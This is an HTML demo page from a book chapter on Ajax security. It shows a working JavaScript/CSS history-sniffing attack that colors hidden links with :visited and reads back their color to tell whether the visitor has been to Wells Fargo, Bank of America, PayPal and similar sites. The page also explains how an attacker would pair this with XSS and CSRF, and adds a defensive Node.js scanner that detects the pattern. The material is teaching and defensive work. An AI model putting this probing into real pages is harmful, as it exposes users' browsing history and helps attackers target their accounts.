<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Chapter 7 : Security - History</title>
<link rel="stylesheet" href="http://ajaxref.com/ch7/global.css" type="text/css" media="screen" />
<style type="text/css">
a.stealhistory:link{color:#FF0000}
a.stealhistory:visited{color:#00FF00}
</style>
<script src="http://ajaxref.com/ch7/utilities.js" type="text/javascript"></script>
<script type="text/javascript">
/* Show how many entries the history holds; only the count is exposed, not the URLs. */
function getHistoryLength()
{
    var responseOutput = document.getElementById("responseOutput");
    responseOutput.innerHTML = "<strong>Length of History through JavaScript: </strong>" + window.history.length;
}

/* List every candidate URL that checkHistory() reports as visited. */
function getHistory(stealhistorysites)
{
    var responseOutput = document.getElementById("responseOutput");
    responseOutput.innerHTML = "<strong>Checking History through JavaScript/CSS. </strong><br />";
    responseOutput.innerHTML += "<br /><strong>You have been to: </strong><br />";
    for (var i = 0; i < stealhistorysites.length; i++)
    {
        if (checkHistory(stealhistorysites[i]))
            responseOutput.innerHTML += stealhistorysites[i] + "<br />";
    }
}

/* Create a hidden link to the URL and read back its color.
   The a.stealhistory:visited rule above colors visited links #00FF00. */
function checkHistory(url)
{
    var found = false;
    var link = document.createElement("a");
    link.className = "stealhistory";
    link.href = url;
    link.appendChild(document.createTextNode("stealhistory"));
    link.style.visibility = "hidden";
    document.body.appendChild(link);
    /* getStyle() is provided by utilities.js */
    var color = getStyle(link, "color").toLowerCase();
    document.body.removeChild(link);
    if (color == "rgb(0, 255, 0)" || color == "#00ff00")
        found = true;
    return found;
}

window.onload = function()
{
    var stealhistorysites = new Array("http://www.google.com/", "http://ajaxref.com/ch7/history.html", "https://www.wellsfargo.com/", "http://www.bankofamerica.com/", "http://www.washingtonmutual.com/", "http://www.amazon.com/", "https://home.americanexpress.com/", "https://www.paypal.com/");
    document.requestForm.checkHistoryLength.onclick = function(){ getHistoryLength(); };
    document.requestForm.checkVisited.onclick = function(){ getHistory(stealhistorysites); };
    var websites = document.getElementById("websites");
    /* Build the markup as one string: assigning an unclosed <ul> to innerHTML
       closes it immediately, which would leave the <li> items outside the list. */
    var list = "<strong>We will check for history of the following sites:</strong><ul>";
    for (var i = 0; i < stealhistorysites.length; i++)
        list += "<li>" + stealhistorysites[i] + "</li>";
    list += "</ul><br />";
    websites.innerHTML = list;
};
</script>
</head>
<body>
<div class="content">
<h1>Stealing History with JavaScript and CSS</h1><br />
<form action="#" name="requestForm">
<input type="button" value="Check History Length" name="checkHistoryLength" />
<input type="button" value="Check for Visited URLs" name="checkVisited" />
</form>
</div>
<br />
<div id="websites" class="response"></div>
<br /><br />
<div id="responseOutput" class="response"></div>
<br /><br />
<div id="scenarios">
<h3>Scenarios</h3>
<p>A malicious site, or a site compromised through XSS, may include this history-checking script to see whether you have been to sites that interest the attacker. The attacker will then use CSRF to attempt to perform some action at that site as you, if you are still authenticated via a cookie.</p>
<p><em>Note:</em> The example checks only a few sites, but it could check a large number in a very short time, or use a communications request to fetch the list of sites or URLs it is interested in checking.</p>
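<p>A defensive counterpart to the demo above, as an added example that is not part of the original page: a heuristic scanner (Node.js) that flags page source when a selector's :visited color differs from its :link color and the script both references that class and compares against the :visited color literal. The function names and the benign sample are assumptions made for illustration; the flagged inputs are this page's CSS rules and an excerpt of its checkHistory() function.</p>

```javascript
// Added example (not from the original page): heuristic scan for the
// :link/:visited color-probe pattern used by the demo on this page.

// Collect the color declared per selector in :link and :visited rules.
function visitedColorRules(css) {
  const rules = {};
  const re = /([^{}]+?):(link|visited)\s*\{([^}]*)\}/gi;
  let m;
  while ((m = re.exec(css)) !== null) {
    const color = /(?:^|;)\s*color\s*:\s*([^;]+)/i.exec(m[3]);
    if (!color) continue;
    const sel = m[1].trim();
    rules[sel] = rules[sel] || {};
    rules[sel][m[2].toLowerCase()] = color[1].trim().toLowerCase();
  }
  return rules;
}

// "#00ff00" -> "rgb(0, 255, 0)", the form a computed color usually takes.
function hexToRgb(hex) {
  const h = /^#([0-9a-f]{2})([0-9a-f]{2})([0-9a-f]{2})$/.exec(hex);
  return h ? "rgb(" + h.slice(1).map(x => parseInt(x, 16)).join(", ") + ")" : null;
}

// Flag selectors whose :visited color differs from :link when the script
// also mentions the selector's class and a literal of the :visited color.
function findHistoryProbes(css, script) {
  const js = script.toLowerCase();
  const hits = [];
  for (const [sel, c] of Object.entries(visitedColorRules(css))) {
    if (!c.link || !c.visited || c.link === c.visited) continue;
    const cls = (/\.([\w-]+)/.exec(sel) || [])[1];
    const forms = [c.visited, hexToRgb(c.visited)].filter(Boolean);
    const compared = forms.some(f => js.includes('"' + f + '"') || js.includes("'" + f + "'"));
    if (!cls || !js.includes(cls.toLowerCase()) || !compared) continue;
    hits.push(sel);
  }
  return hits;
}

// PAGE_* are taken from this page; BENIGN_* are constructed for contrast.
const PAGE_CSS = "a.stealhistory:link{color:#FF0000}\na.stealhistory:visited{color:#00FF00}";
const PAGE_JS = 'link.className = "stealhistory";\n' +
  'if(color == "rgb(0, 255, 0)" || color == "#00ff00") found = true;';
const BENIGN_CSS = "a.nav:link{color:#0000ee}\na.nav:visited{color:#551a8b}";
const BENIGN_JS = 'document.querySelector("a.nav").focus();';

console.log(findHistoryProbes(PAGE_CSS, PAGE_JS));     // ["a.stealhistory"]
console.log(findHistoryProbes(BENIGN_CSS, BENIGN_JS)); // []
```

<p>Major browsers have since changed computed-style queries to report links as unvisited, so a hit points to probing intent in page code rather than a working leak.</p>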
</div>
</body>
</html>